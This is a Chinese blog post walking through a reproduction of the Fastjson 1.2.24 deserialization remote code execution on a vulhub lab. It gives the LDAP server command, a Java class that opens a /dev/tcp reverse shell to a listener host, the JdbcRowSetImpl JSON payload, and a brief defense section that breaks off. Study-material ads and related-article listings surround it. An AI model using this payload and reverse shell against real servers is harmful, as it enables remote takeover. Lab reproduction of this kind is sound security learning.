Fastjson反序列化漏洞原理与复现_fastjson反序化漏洞解决

最新推荐文章于 2024-05-20 12:42:00 发布
最新推荐文章于 2024-05-20 12:42:00 发布
阅读量407 收藏 8
点赞数 5
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84558590/article/details/138961079
版权

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

fastjson版本<1.2.24 <1.2.27

序列化时会调用成员变量的get方法,私有成员变量不会被序列化。

反序列化时,会调用成员变量的set方法,public修饰的成员全部自动赋值。

2.1 环境搭建

vulhub靶场

#1 下载靶场
git clone https://github.com/vulhub/vulhub.git
cd vulhub/fastjson/1.2.24-rce
#2 编译,运行
docker-compose build
docker-compose up -d
#3 查看IP和端口
docker-compose ps
docker ps
#4 关闭靶场
docker-compose down

这里进入vulhub目录太慢了,而且路径也容易记错。可以篡改系统命令,添加命令别名。

vim ~/.bashrc
#在合适的位置添加如下语句
alias vulhub='cd /var/local/soft/vulhub;ls'
#保存并退出
source ~/.bashrc

靶机:centos 192.168.131.121

监听主机:Kali 192.168.131.134:9999

其他环境与Log4j相同——http://t.csdn.cn/l1xmR

2.2 测试

LDAP服务器中,执行如下代码

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.101.128:2222/#GetShell 1234

其中getshell是恶意类的类名,1234是监听的端口号,该工具可以启动JNDI或RMI接口。

当命令行显示Listening on 0.0.0.0:1234时表示服务开启成功。

构建一个恶意类GetShell.class

/\*
 \* getshell.java
 \* 将其编译后生成Exploit.class
 \* 上传到HTTP服务器
 \*/
public class GetShell{
    public GetShell(){
        Runtime.getRuntime.exec("bash -i >&/dev/tcp/192.168.101.134/9999 0>&1");//监听主机的IP和端口号
    }
    public static void main(Sring[] args){
        GetShell e = new GetShell();
    }
}
//直接使用静态代码块亦可

监听主机Kali开启监听:

nc -lvp 9999      # 9999是监听反弹shell的端口

这时,可以向靶场环境以POST的方式发送数据(payload)如下

POST /HTTP/1.1
Host:xxxxxxxx
...
Content-Type:application/json
Content-Length:146
{
	"x":{
		"@type":"com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName":"ldap://192.168.101.133:1234/GetShell",
		"autoCommit":true
	}
}

反弹shell成功即可。

2.3 过程分析

用到的反序列化方法

//返回实际类型的对象
Object returnObj = JSON.parseObject(serializedStr,returnObject.class);
//返回JsonObject对象
Object obj = JSON.parse(serializedStr);


//子类中包含接口或抽象类时,类型丢失
{"@type":"com.xxx.User","age":2,"flag":false,"name":"zhangsan"}

利用类

com.sun.rowset.JdbcRowSetImpl

使用时会引入一个dataSourceName支持传入一个rmi数据源,可以实现JNDI、LDAP端口注入攻击。

流程

序列化字符:准备类名、dataSourceName属性和autoCommit属性;

JdbcRowSetImpl反序列化,调用JdbcRowSetImpl的setAutoCommit(),setAutoCommit()调用connect();

connect()调用lookup()链接到LDAP/RMI服务器,下载恶意代码到本地,执行攻击。

3 漏洞防御

3.1 排查方法

  1. 找到发送JSON序列化数据的接口
  2. 抓包判断是否使用fastjson
  3. 传入不完整或错误的json数据,{“xx”:"查看返回的数据是否暴露
  4. 使用dnslog ceye检测
package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
public class FastTest {


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)



**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84558590
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson漏洞——举例说明漏洞以及原理分析——一看就会
可乐多点冰的博客
09-01 4875
最近公司一直说fastjson漏洞,比较很严重,要换成其他的json工具。怀着好奇的心情去看了一些文章,现在简单的记录一下。 1、漏洞分析 总体而言是一个叫做autoType的在搞事情。那么autoType是什么呢? 我们写一段简单代码演示一下: public class JSONController { public static void main(String[] args) throws ParseException { Province province = new
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
fastjson到底做错了什么?为什么会被频繁爆出漏洞
HollisChuang's Blog
07-06 2万+
GitHub 15.8k Star 的Java工程师成神之路,不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的真的不来了解一下吗! fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson被爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的
Fastjson漏洞之CVE-2017-18349
最新发布
GalaxySpaceX的博客
05-20 1178
Fastjson漏洞之CVE-2017-18349
Fastjson漏洞原理分析
LTianHang的博客
06-04 4978
fastjson中产生漏洞的根本原因在于其autoType机制,以及针对于autoType机制做的checkAutoType检测防御机制。
FastJson 反序列化漏洞原理分析
buffedon的博客
08-01 8723
FastJson 反序列化漏洞原理分析FastJson 简介漏洞原理FastJson 序列操作序列反序列化调用链分析原理利用过程分析RMI 的实现JNDI服务器端代码构造总结1. fastjson 利用过程2. 恶意类怎么上传到服务端3. fastjson rce的原理参考 FastJson 简介 fastjson框架下载:https://github/alibaba/fastjson fastjson-jndi 下载:https://github.com/earayu/fastjson_jndi_po
Fastjson反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列数据转换回内存中的对象的过程。在Java中,这一...
springmvc fastjson 反序列化时间格式方法(推荐)
10-20
本文将详细介绍两种解决Spring MVC中Fastjson反序列化时间格式的方法。 ### 方法一:实体类字段注解 第一种情况是在处理从后台获取的数据时,我们需要对实体类中的日期字段进行格式。在实体类中,我们可以在...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
## 漏洞背景与原理 这个漏洞主要源自Fastjson的`parseObject`和`parseArray`等方法,当解析包含特殊JSON格式的对象或数组时,Fastjson未能进行有效的安全校验,导致了反序列化过程中的代码执行。攻击者可以通过构造...
Fastjson反序列化漏洞
热门推荐
LJH1999ZN的博客
03-31 3万+
一、fastjson简介 fastjson是java的一个库,可以将java对象转为json格式的字符串,也可以将json格式的字符串转为java对象 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。 二、fastjson反序列化漏洞原理反序列化的时候,会进入parseField方法,进
渗透测试 | FastJson漏洞原理复现
m0_60571990的博客
03-09 1394
渗透测试 | FastJson漏洞原理复现
网络安全】渗透测试——FastJson漏洞原理复现
程序员若风的博客
11-26 1179
Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库, 用于将数据在 JSON 和 Java Object 之间互相转换, 提供两个主要接口 JSON.toJSONString 和 JSON.parseObject / JSON. parse 来分别实现序列反序列化操作.
fastjson反序列化漏洞原理及利用
杨航的专栏
07-01 3455
重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; public class Exploit { public Exploit() { try{ // 要执行的命令 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(commands); pc.waitFor()
阿里代码漏洞FastJson,3分钟搞懂漏洞原理
hnjsjsac的博客
08-20 1349
前言前段时间FastJson被曝高危漏洞,其实之前也被报过类似的漏洞,只是项目中没有使用,所以一直也没怎么关注;这一次刚好有项目用到FastJson,打算对其做一个分析。漏洞背景❝2020...
Java反序列化漏洞总结【fastjson为例】
z69183787的专栏
01-06 1440
前言 前段时间FastJson被曝高危漏洞,其实之前也被报过类似的漏洞,只是项目中没有使用,所以一直也没怎么关注;这一次刚好有项目用到FastJson,打算对其做一个分析。 漏洞背景 2020年05月28日, 360CERT监测发现业内安全厂商发布了[Fastjson远程代码执行漏洞](https://cert.360.cn/warning/detail?id=af8fea5f165df6198033de208983e2ad)的风险通告,漏洞等级:高危。Fastjson是阿里巴巴的开源JSON解析库,
Fastjson反序列化漏洞利用原理和POC
u012990687的专栏
11-30 1万+
0x01 前言 FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列为JSON字符串,也可以从JSON字符串反序列化到Java Bean。Fastjson应用范围非常广,在github上star数超过22k。2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。2020年6月1日 fastjson爆发新的反序列化远程代码执行漏洞,fastjso
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
Fastjson是一款Java语言编写的高性能JSON处理器,被广泛应用于各种Java应用程序中。然而,Fastjson存在反序列化漏洞,黑客可以利用该漏洞实现远程代码执行,因此该漏洞被广泛利用。 检测Fastjson反序列化漏洞的方法: 1. 扫描源代码,搜索是否存在Fastjson相关的反序列化代码,如果存在,则需要仔细检查反序列化的过程是否安全。 2. 使用工具进行扫描:目前市面上有很多漏洞扫描工具已经支持Fastjson反序列化漏洞的检测,例如:AWVS、Nessus、Burp Suite等。 利用Fastjson反序列化漏洞的方法: 1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现文件读取操作。 3. 利用Fastjson反序列化漏洞实现反弹Shell:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现反弹Shell操作。 防范Fastjson反序列化漏洞的方法: 1. 更新Fastjson版本:Fastjson官方在1.2.46版本中修复了反序列化漏洞,建议使用该版本或更高版本。 2. 禁止使用Fastjson反序列化:如果应用程序中不需要使用Fastjson反序列化功能,建议禁止使用该功能,可以使用其他JSON处理器。 3. 输入验证:对所有输入进行校验和过滤,确保输入数据符合预期,避免恶意数据进入系统。 4. 序列过滤:对敏感数据进行序列过滤,确保敏感数据不会被序列。 5. 安全加固:对系统进行安全加固,如限制系统权限、加强访问控制等,避免黑客利用Fastjson反序列化漏洞获取系统权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值